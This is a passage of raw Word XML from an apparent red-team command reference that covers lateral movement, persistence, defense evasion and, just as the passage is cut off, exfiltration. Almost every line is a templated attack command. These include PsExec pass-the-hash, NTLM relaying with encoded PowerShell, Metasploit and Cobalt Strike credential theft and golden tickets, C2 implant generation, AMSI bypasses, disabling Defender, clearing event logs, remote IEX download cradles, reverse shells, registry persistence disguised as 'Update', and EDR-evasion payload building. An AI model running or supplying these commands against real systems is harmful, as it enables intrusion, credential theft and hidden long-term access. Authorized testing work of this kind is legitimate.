        <w:t xml:space="preserve">Microsoft’s legitimate remote execution tool for SYSTEM access.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cmd.exe &gt; /opt/tsec/output/7.5.1_psexec_shell_{target}.txt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-s cmd.exe &gt; /opt/tsec/output/7.5.2_psexec_system_{target}.txt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-s hostname &gt; /opt/tsec/output/7.5.3_psexec_hostname_{target}.txt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&amp; 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-c {local_exe} &gt; /opt/tsec/output/7.5.4_psexec_copy_{target}.txt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-i {session} notepad.exe &gt; /opt/tsec/output/7.5.5_psexec_interactive_{target}.txt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@{targets_file} -u {user} -p {password} -s cmd /c 'systeminfo' &gt; /opt/tsec/output/7.5.6_psexec_batch.txt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-e cmd.exe &gt; /opt/tsec/output/7.5.7_psexec_noprofile_{target}.txt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-n 10 whoami &gt; /opt/tsec/output/7.5.8_psexec_timeout_{target}.txt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psexec.py {domain}/{user}@{target} -hashes {lmhash}:{nthash} &gt; /opt/tsec/output/7.5.9_psexec_hash_{target}.txt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Remote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psexec.exe \\{target} -u {user} -p {password} -s -c -f {payload} -d &gt; /opt/tsec/output/7.5.10_psexec_full_{target}.txt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96"/>
    <w:bookmarkStart w:id="97" w:name="tool-7.6-ligolo-ng"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Tool 7.6 — Ligolo-ng</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Advanced tunneling with TUN interface for transparent network pivoting.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./proxy -selfcert -laddr 0.0.0.0:{lport} &gt; /opt/tsec/output/7.6.1_ligolo_proxy.txt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./agent -connect {lhost}:{lport} -ignore-cert &gt; /opt/tsec/output/7.6.2_ligolo_agent.txt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ip tuntap add user $(whoami) mode tun ligolo &amp;&amp; sudo ip link set ligolo up &gt; /opt/tsec/output/7.6.3_ligolo_tun.txt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ip route add {internal_subnet}/24 dev ligolo &gt; /opt/tsec/output/7.6.4_ligolo_route.txt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Tunnel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 -&gt; tunnel_start &gt; /opt/tsec/output/7.6.5_ligolo_tunnel.txt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 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listener_add -addr 0.0.0.0:{port} -to 127.0.0.1:{port} -bind &gt; /opt/tsec/output/7.6.6_ligolo_listener.txt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Multi-hop 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 -&gt; tunnel_start -&gt; agent -&gt; connect {next_hop} &gt; /opt/tsec/output/7.6.7_ligolo_multihop.txt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 -&gt; tunnel_start -&gt; add_route {subnet} &gt; /opt/tsec/output/7.6.8_ligolo_autoroute.txt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listener_add -addr 0.0.0.0:{port} -to {internal_ip}:{port} &gt; /opt/tsec/output/7.6.9_ligolo_portfwd.txt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Pivot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 -&gt; agent -&gt; tunnel_start -&gt; add_route -&gt; listener_add &gt; /opt/tsec/output/7.6.10_ligolo_full.txt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97"/>
    <w:bookmarkStart w:id="98" w:name="tool-7.7-chisel"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Tool 7.7 — Chisel</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Fast TCP/UDP tunnel over HTTP for SOCKS5 proxy and port forwarding.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chisel server -p {port} --reverse &gt; /opt/tsec/output/7.7.1_chisel_server.txt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chisel client http://{lhost}:{lport} {local_port}:{remote_host}:{remote_port} &gt; /opt/tsec/output/7.7.2_chisel_client.txt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chisel client http://{lhost}:{lport} R:socks &gt; /opt/tsec/output/7.7.3_chisel_socks.txt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SOCKS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chisel client http://{lhost}:{lport} socks &gt; /opt/tsec/output/7.7.4_chisel_fsocks.txt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 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chisel client http://{lhost}:{lport} 3000:10.0.0.1:3000 3389:10.0.0.2:3389 &gt; /opt/tsec/output/7.7.5_chisel_multi.txt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Protection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chisel server -p {port} --auth {user}:{password} --reverse &gt; /opt/tsec/output/7.7.6_chisel_auth.txt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Forwarding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chisel client http://{lhost}:{lport} udp://53:10.0.0.1:53 &gt; /opt/tsec/output/7.7.7_chisel_udp.txt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chisel client --fingerprint '{hash}' http://{lhost}:{lport} {ports} &gt; /opt/tsec/output/7.7.8_chisel_fingerprint.txt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chisel client --header 'X-Auth={token}' http://{lhost}:{lport} {ports} &gt; /opt/tsec/output/7.7.9_chisel_header.txt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Tunnel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chisel server -p 443 --auth u:p --reverse --socks5 &amp;&amp; chisel client --auth u:p https://{lhost} R:socks &gt; /opt/tsec/output/7.7.10_chisel_full.txt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98"/>
    <w:bookmarkStart w:id="99" w:name="tool-7.8-proxychains"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Tool 7.8 — Proxychains</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Force TCP connections through SOCKS/HTTP proxies.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SOCKS5 Nmap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proxychains nmap -sT -Pn {internal_subnet} &gt; /opt/tsec/output/7.8.1_proxychains_nmap.txt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RDP Through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proxychains xfreerdp /u:{user} /p:{password} /v:{internal_ip} &gt; /opt/tsec/output/7.8.2_proxychains_rdp.txt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via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proxychains ssh {user}@{internal_ip} &gt; /opt/tsec/output/7.8.3_proxychains_ssh.txt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proxychains curl http://{internal_ip}:8080 &gt; /opt/tsec/output/7.8.4_proxychains_http.txt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proxychains -q nmap --dns-servers {dns_ip} -sT {target} &gt; /opt/tsec/output/7.8.5_proxychains_dns.txt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Metasploit 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proxychains msfconsole -r {resource_script} &gt; /opt/tsec/output/7.8.6_proxychains_msf.txt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proxychains -f {config_file} {command} &gt; /opt/tsec/output/7.8.7_proxychains_multi.txt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proxychains -q {command} &gt; /opt/tsec/output/7.8.8_proxychains_quiet.txt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proxychains crackmapexec smb {internal_subnet} -u {user} -p {password} &gt; /opt/tsec/output/7.8.9_proxychains_smb.txt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Internal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proxychains nmap -sT -Pn -p 22,80,443,445,3389,5985 {internal_subnet} &gt; /opt/tsec/output/7.8.10_proxychains_full.txt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99"/>
    <w:bookmarkStart w:id="100" w:name="tool-7.9-sshuttle"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Tool 7.9 — sshuttle</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Transparent VPN over SSH for network pivoting.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Tunnel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sshuttle -r {user}@{pivot_host} {internal_subnet}/24 &gt; /opt/tsec/output/7.9.1_sshuttle_full.txt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sshuttle -r {user}@{pivot_host} {internal_subnet}/24 --dns &gt; /opt/tsec/output/7.9.2_sshuttle_dns.txt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sshuttle -r {user}@{pivot_host} {internal_subnet}/24 -l 0.0.0.0 &gt; /opt/tsec/output/7.9.3_sshuttle_listen.txt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Hosts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sshuttle -r {user}@{pivot_host} {internal_subnet}/24 --auto-hosts --dns &gt; /opt/tsec/output/7.9.4_sshuttle_autohosts.txt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sshuttle -r {user}@{pivot_host} -x {excluded_subnet} {subnet}/24 &gt; /opt/tsec/output/7.9.5_sshuttle_exclude.txt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Daemon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sshuttle -r {user}@{pivot_host} {subnet}/24 --daemon &gt; /opt/tsec/output/7.9.6_sshuttle_daemon.txt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sshuttle -r {user}@{pivot_host} -e 'ssh -i {key}' {subnet}/24 &gt; /opt/tsec/output/7.9.7_sshuttle_key.txt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sshuttle -r {user}@{pivot_host}:{port} {subnet}/24 &gt; /opt/tsec/output/7.9.8_sshuttle_port.txt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Auto-nets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sshuttle -r {user}@{pivot_host} --auto-nets &gt; /opt/tsec/output/7.9.9_sshuttle_autonets.txt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VPN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sshuttle -r {user}@{pivot_host} --dns --auto-hosts --auto-nets -D &gt; /opt/tsec/output/7.9.10_sshuttle_vpn.txt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00"/>
    <w:bookmarkStart w:id="101" w:name="tool-7.10-ntlmrelayx.py"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Tool 7.10 — ntlmrelayx.py</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">NTLM relay attack tool for SMB, HTTP, LDAP, MSSQL relaying.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Relay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-tf {targets_file} -smb2support &gt; /opt/tsec/output/7.10.1_ntlmrelayx_smb.txt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 {target} -c 'whoami /all' -smb2support &gt; /opt/tsec/output/7.10.2_ntlmrelayx_cmd.txt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 ldap://{dc_ip} --no-da --no-acl &gt; /opt/tsec/output/7.10.3_ntlmrelayx_ldap.txt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 ldap://{dc_ip} --add-computer {computer_name} &gt; /opt/tsec/output/7.10.4_ntlmrelayx_account.txt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 {target} --serve-image {image} -smb2support &gt; /opt/tsec/output/7.10.5_ntlmrelayx_http.txt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WPAD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-tf {targets_file} -w -l /opt/tsec/output/7.10.6_ntlmrelayx_wpad.log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 DNS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 {target} -6 -wh {domain} -l /opt/tsec/output/7.10.7_ntlmrelayx_ipv6.log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SOCKS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-tf {targets_file} -socks -smb2support &gt; /opt/tsec/output/7.10.8_ntlmrelayx_socks.txt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 {target} -of /opt/tsec/output/7.10.9_ntlmrelayx_{target}.txt -smb2support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Relay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ntlmrelayx.py -tf {targets_file} -c 'powershell -enc {payload}' -smb2support -l /opt/tsec/output/7.10.10_ntlmrelayx_full.log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13" w:name="phase-8-persistence-defense-evasion"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Phase 8: Persistence &amp; Defense Evasion</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="aa"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Maintain long-term access while avoiding detection through stealth techniques, AMSI bypass, and process injection.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="103" w:name="tool-8.1-metasploit-framework"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Tool 8.1 — Metasploit Framework</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Industry-standard penetration testing framework.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 Launch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msfconsole -x 'use {exploit}; set RHOSTS {target}; set PAYLOAD {payload}; set LHOST {lhost}; run' &gt; /opt/tsec/output/8.1.1_msf_exploit.txt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msfconsole -x 'use exploit/multi/handler; set PAYLOAD {payload}; set LHOST {lhost}; set LPORT {lport}; run' &gt; /opt/tsec/output/8.1.2_msf_handler.txt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run persistence -U -i 5 -p {port} -r {lhost} &gt; /opt/tsec/output/8.1.3_msf_persistence.txt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Migrate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migrate {pid} &gt; /opt/tsec/output/8.1.4_msf_migrate.txt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Keylogger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keyscan_start &gt; /opt/tsec/output/8.1.5_msf_keylog.txt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screenshot -p /opt/tsec/output/8.1.6_msf_screenshot.png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hashdump &gt; /opt/tsec/output/8.1.7_msf_hashdump.txt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portfwd add -l {local} -p {remote} -r {target} &gt; /opt/tsec/output/8.1.8_msf_portfwd.txt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run autoroute -s {subnet} &gt; /opt/tsec/output/8.1.9_msf_route.txt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msfconsole -x 'use exploit/multi/handler; set PAYLOAD windows/x64/meterpreter/reverse_tcp; set LHOST {lhost}; set LPORT {port}; set ExitOnSession false; set AutoRunScript post/windows/manage/migrate; run -j' &gt; /opt/tsec/output/8.1.10_msf_full.txt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03"/>
    <w:bookmarkStart w:id="104" w:name="tool-8.2-cobalt-strike"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Tool 8.2 — Cobalt Strike</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Commercial adversary simulation and red team platform.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teamserver {lhost} {password} {c2_profile} &gt; /opt/tsec/output/8.2.1_cs_teamserver.log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./aggressor -host {host} -port {port} -user {user} -password {password} &gt; /opt/tsec/output/8.2.2_cs_payload.txt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./aggressor -host {host} -port {port} -user {user} -password {password} -command "powershell" &gt; /opt/tsec/output/8.2.3_cs_ps1.txt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./aggressor -host {host} -port {port} -user {user} -password {password} -command "browserpivot {pid}" &gt; /opt/tsec/output/8.2.4_cs_browser.txt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Tunnel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./aggressor -host {host} -port {port} -user {user} -password {password} -command "ssh {target} {user} {password}" &gt; /opt/tsec/output/8.2.5_cs_ssh.txt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SOCKS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./aggressor -host {host} -port {port} -user {user} -password {password} -command "socks {port}" &gt; /opt/tsec/output/8.2.6_cs_socks.txt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./aggressor -host {host} -port {port} -user {user} -password {password} -command "golden_ticket {domain} {krbtgt_hash}" &gt; /opt/tsec/output/8.2.7_cs_golden.txt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Steal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./aggressor -host {host} -port {port} -user {user} -password {password} -command "steal_token {pid}" &gt; /opt/tsec/output/8.2.8_cs_token.txt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Assembly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./aggressor -host {host} -port {port} -user {user} -password {password} -command "execute-assembly {dotnet_assembly}" &gt; /opt/tsec/output/8.2.9_cs_assembly.txt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Malleable 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./aggressor -host {host} -port {port} -user {user} -password {password} -command "load_profile {profile}.profile" &gt; /opt/tsec/output/8.2.10_cs_malleable.txt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04"/>
    <w:bookmarkStart w:id="105" w:name="tool-8.3-sliver-c2-persistence"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Tool 8.3 — Sliver C2 (Persistence)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Advanced cross-platform C2 with persistence capabilities.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Implant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--mtls {lhost}:{lport} --os windows --arch amd64 --save /opt/tsec/output/8.3.1_sliver_persist.exe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Beacon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--http https://{lhost} --os linux --arch amd64 --save /opt/tsec/output/8.3.2_sliver_https.elf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Beacon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--dns {domain} --os windows --arch amd64 --save /opt/tsec/output/8.3.3_sliver_dns.exe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generate --http {lhost}:{lport} --format shellcode --save /opt/tsec/output/8.3.4_sliver_shellcode.bin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Assembly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execute-assembly -t {session} {assembly} {args} &gt; /opt/tsec/output/8.3.5_sliver_assembly.txt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Migrate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migrate -t {session} {pid} &gt; /opt/tsec/output/8.3.6_sliver_migrate.txt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Shellcode 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execute-shellcode -t {session} {shellcode_file} &gt; /opt/tsec/output/8.3.7_sliver_shellcode.txt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procdump -t {session} -n lsass.exe &gt; /opt/tsec/output/8.3.8_sliver_procdump.dmp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portfwd add -r {remote_host}:{remote_port} -l {local_port} &gt; /opt/tsec/output/8.3.9_sliver_portfwd.txt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sliver-server multiplayer &gt; /opt/tsec/output/8.3.10_sliver_multiplayer.txt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05"/>
    <w:bookmarkStart w:id="106" w:name="tool-8.4-havoc-c2-evasion"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Tool 8.4 — Havoc C2 (Evasion)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Modern C2 with Demon agent and sleep mask obfuscation.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 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exe --sleep 15 --jitter 20 --output /opt/tsec/output/8.4.1_havoc_demon.exe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dll --output /opt/tsec/output/8.4.2_havoc_dll.dll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shellcode --output /opt/tsec/output/8.4.3_havoc_shellcode.bin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service-exe --output /opt/tsec/output/8.4.4_havoc_service.exe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pspowershell --output /opt/tsec/output/8.4.5_havoc_ps1.ps1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Listener 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listener create --name {name} --protocol http --port {port} --hosts {lhost} &gt; /opt/tsec/output/8.4.6_havoc_listener.txt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Steal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token steal {pid} &gt; /opt/tsec/output/8.4.7_havoc_token.txt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Shellcode Inject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shellcode inject {pid} {shellcode_file} &gt; /opt/tsec/output/8.4.8_havoc_inject.txt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transfer download {remote_file} {local_path} &gt; /opt/tsec/output/8.4.9_havoc_download.txt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./havoc client -&gt; payload generate --profile {profile} --arch x64 --format exe --sleep-obf --export /opt/tsec/output/8.4.10_havoc_full.exe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</w:tbl>
    <w:bookmarkEnd w:id="106"/>
    <w:bookmarkStart w:id="107" w:name="tool-8.5-powersploit"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Tool 8.5 — PowerSploit</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">PowerShell modules for code execution, persistence, and evasion.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Invoke-ReflectivePEInjection -PEBytes $bytes -ProcId {pid} &gt; /opt/tsec/output/8.5.1_powersploit_pe.txt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Shellcode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Invoke-Shellcode -Shellcode $bytes -ProcessId {pid} &gt; /opt/tsec/output/8.5.2_powersploit_shellcode.txt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Mimikatz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Invoke-Mimikatz -DumpCreds &gt; /opt/tsec/output/8.5.3_powersploit_mimikatz.txt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Manipulation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Invoke-TokenManipulation -ImpersonateUser -Username 'nt authority\system' &gt; /opt/tsec/output/8.5.4_powersploit_token.txt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WMI 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Install-Persistence -Trigger AtLogon -Payload {script} -PayloadType Script &gt; /opt/tsec/output/8.5.5_powersploit_wmi.txt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Invoke-DllInjection -ProcessID {pid} -Dll {dll_path} &gt; /opt/tsec/output/8.5.6_powersploit_dll.txt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Invoke-PowerShellTcp -Reverse -IPAddress {lhost} -Port {lport} &gt; /opt/tsec/output/8.5.7_powersploit_rev.txt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Invoke-Portscan -Hosts {target} -Ports {ports} -Threads 100 &gt; /opt/tsec/output/8.5.8_powersploit_portscan.txt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BloodHound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Invoke-BloodHound -CollectionMethod All -ZipFileName /opt/tsec/output/8.5.9_powersploit_bloodhound.zip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Privesc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Invoke-AllChecks &gt; /opt/tsec/output/8.5.10_powersploit_allchecks.txt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07"/>
    <w:bookmarkStart w:id="108" w:name="tool-8.6-amsietwbypass-toolkit"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Tool 8.6 — AMSI/ETW/Bypass Toolkit</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Collection of techniques for bypassing Windows security controls.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AMSI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[Ref].Assembly.GetTypes().Where({$_.Name -like '*iUtils'}).GetFields(40).SetValue($null,$true) &gt; /opt/tsec/output/8.6.1_amsi_patch.txt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ETW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[System.Diagnostics.Eventing.Reader.EventLogSession]::GlobalSession.ClearLog('Microsoft-Windows-PowerShell/Operational') &gt; /opt/tsec/output/8.6.2_etw_patch.txt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Forced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[Ref].Assembly.GetTypes() \| ForEach-Object { if ($_.Name -like '*iUtils') { $f = $_.GetFields(40); $f[0].SetValue($null,$true) } } &gt; /opt/tsec/output/8.6.3_amsi_forced.txt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CLR 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[AppDomain]::CurrentDomain.GetAssemblies().Where({$_.GlobalAssemblyCache}).GetType('AmsiUtils') &gt; /opt/tsec/output/8.6.4_amsi_clr.txt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[System.Reflection.Assembly]::LoadWithPartialName('System.Management.Automation').GetType('AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true) &gt; /opt/tsec/output/8.6.5_amsi_memory.txt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 Disable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Set-MpPreference -DisableRealtimeMonitoring $true; Set-MpPreference -DisableBehaviorMonitoring $true &gt; /opt/tsec/output/8.6.6_wd_disable.txt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 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Add-MpPreference -ExclusionPath 'C:\Temp'; Add-MpPreference -ExclusionProcess 'powershell.exe' &gt; /opt/tsec/output/8.6.7_wd_exclude.txt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Encoded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powershell -enc {base64_command} &gt; /opt/tsec/output/8.6.8_encoded.txt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Cradle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powershell -nop -w hidden -c 'IEX(iwr http://{lhost}/{script})' &gt; /opt/tsec/output/8.6.9_cradle.txt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[Ref].Assembly.GetTypes().Where({$_.Name -like '*iUtils'}).GetFields(40).SetValue($null,$true); IEX(iwr http://{lhost}/{payload}) &gt; /opt/tsec/output/8.6.10_full_evasion.txt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08"/>
    <w:bookmarkStart w:id="109" w:name="tool-8.7-invoke-obfuscation"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Tool 8.7 — Invoke-Obfuscation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">PowerShell command and script obfuscation framework.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Obfuscation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Invoke-Obfuscation -ScriptBlock {script} -Token -Command 'Token,Member,Binary' &gt; /opt/tsec/output/8.7.1_obfuscate_token.txt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 Obfuscation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Invoke-Obfuscation -ScriptBlock {script} -Ast &gt; /opt/tsec/output/8.7.2_obfuscate_ast.txt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Obfuscation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Invoke-Obfuscation -ScriptBlock {script} -String &gt; /opt/tsec/output/8.7.3_obfuscate_string.txt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 Launcher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Invoke-Obfuscation -ScriptBlock {script} -Encoding -Command 'Encoding,Launcher' &gt; /opt/tsec/output/8.7.4_obfuscate_encoding.txt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Invoke-Obfuscation -ScriptBlock {script} -Compress &gt; /opt/tsec/output/8.7.5_obfuscate_compress.txt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Invoke-Obfuscation -ScriptBlock {script} -SecureString &gt; /opt/tsec/output/8.7.6_obfuscate_secure.txt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Invoke-Obfuscation -ScriptBlock {script} -Token -String -Encoding &gt; /opt/tsec/output/8.7.7_obfuscate_multilayer.txt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 Obfuscation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Invoke-Obfuscation -ScriptBlock {script} -Clip &gt; /opt/tsec/output/8.7.8_obfuscate_clip.txt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Obfuscation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Invoke-Obfuscation -ScriptPath {input}.ps1 -OutputPath /opt/tsec/output/8.7.9_obfuscate_file.ps1 -Token -String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Invoke-Obfuscation -ScriptBlock {script} -Token -Ast -String -Encoding -Compress -Launcher 'PS' &gt; /opt/tsec/output/8.7.10_obfuscate_full.txt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09"/>
    <w:bookmarkStart w:id="110" w:name="tool-8.8-unicorn-evasion"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Tool 8.8 — Unicorn (Evasion)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">PowerShell downgrade attack and shellcode injection.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powershell &gt; /opt/tsec/output/8.8.1_unicorn_rev.ps1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macro &gt; /opt/tsec/output/8.8.2_unicorn_macro.txt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certutil &gt; /opt/tsec/output/8.8.3_unicorn_certutil.txt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Shellcode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{shellcode_file} powershell &gt; /opt/tsec/output/8.8.4_unicorn_custom.ps1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Encoding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powershell 5 &gt; /opt/tsec/output/8.8.5_unicorn_encoded.ps1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HTA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hta &gt; /opt/tsec/output/8.8.6_unicorn_hta.txt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AMSI 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powershell --amsi &gt; /opt/tsec/output/8.8.7_unicorn_amsi.ps1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ETW Bypass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powershell --etw &gt; /opt/tsec/output/8.8.8_unicorn_etw.ps1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powershell --amsi --etw &gt; /opt/tsec/output/8.8.9_unicorn_full.ps1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+ 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unicorn.py reverse_tcp {lhost} {lport} macro_hta &gt; /opt/tsec/output/8.8.10_unicorn_macrohta.txt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10"/>
    <w:bookmarkStart w:id="111" w:name="tool-8.9-sharpersist"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Tool 8.9 — SharPersist</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Windows persistence toolkit with 15+ techniques.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Run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SharPersist.exe -t reg -c 'powershell.exe' -a '-ep bypass -file C:\temp\script.ps1' -k 'hkcurun' -n {name} --add &gt; /opt/tsec/output/8.9.1_sharpersist_reg.txt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SharPersist.exe -t schtask -c 'powershell.exe' -a '-ep bypass -file C:\temp\script.ps1' -n {name} --add &gt; /opt/tsec/output/8.9.2_sharpersist_task.txt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SharPersist.exe -t startupfolder -f C:\temp\payload.exe -n {name} --add &gt; /opt/tsec/output/8.9.3_sharpersist_startup.txt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WMI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SharPersist.exe -t wmi -c 'notepad.exe' -n {name} --add &gt; /opt/tsec/output/8.9.4_sharpersist_wmi.txt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Creation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SharPersist.exe -t service -c 'C:\temp\payload.exe' -n {name} --add &gt; /opt/tsec/output/8.9.5_sharpersist_service.txt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SharPersist.exe -t reg -k 'hkcurun' --check &gt; /opt/tsec/output/8.9.6_sharpersist_check.txt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SharPersist.exe -t all --list &gt; /opt/tsec/output/8.9.7_sharpersist_list.txt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SharPersist.exe -t reg -n {name} --remove &gt; /opt/tsec/output/8.9.8_sharpersist_remove.txt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Time-based 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SharPersist.exe -t schtask -c 'powershell.exe' -n {name} -o logon --add &gt; /opt/tsec/output/8.9.9_sharpersist_logon.txt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SharPersist.exe -t reg -c 'powershell.exe' -a '-w hidden -enc {payload}' -k 'hkcurun' -n 'Update' --add &gt; /opt/tsec/output/8.9.10_sharpersist_full.txt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11"/>
    <w:bookmarkStart w:id="112" w:name="tool-8.10-scarecrow"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Tool 8.10 — ScareCrow</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">EDR evasion payload creation with side-loading.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binary -o /opt/tsec/output/8.10.1_scarecrow_binary.exe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control -o /opt/tsec/output/8.10.2_scarecrow_control.cpl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excel -o /opt/tsec/output/8.10.3_scarecrow_excel.xll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 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msi -o /opt/tsec/output/8.10.4_scarecrow_msi.msi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 Loader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dll -o /opt/tsec/output/8.10.5_scarecrow_dll.dll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EDR Unhook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binary -unhook -o /opt/tsec/output/8.10.6_scarecrow_unhook.exe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-injection {process} -o /opt/tsec/output/8.10.7_scarecrow_inject.exe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Syscall Obf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-syscall zww -o /opt/tsec/output/8.10.8_scarecrow_syscall.exe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-sandbox -o /opt/tsec/output/8.10.9_scarecrow_sandbox.exe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Evasion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ScareCrow -I {shellcode}.bin -domain {domain} -delivery binary -unhook -sandbox -syscall direct -o /opt/tsec/output/8.10.10_scarecrow_full.exe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24" w:name="phase-9-actions-on-objectives"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Phase 9: Actions on Objectives</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="aa"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Execute mission-critical actions to achieve engagement goals: data collection, screenshot capture, keylogging, and data exfiltration.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="114" w:name="tool-9.1-rclone"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Tool 9.1 — rclone</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
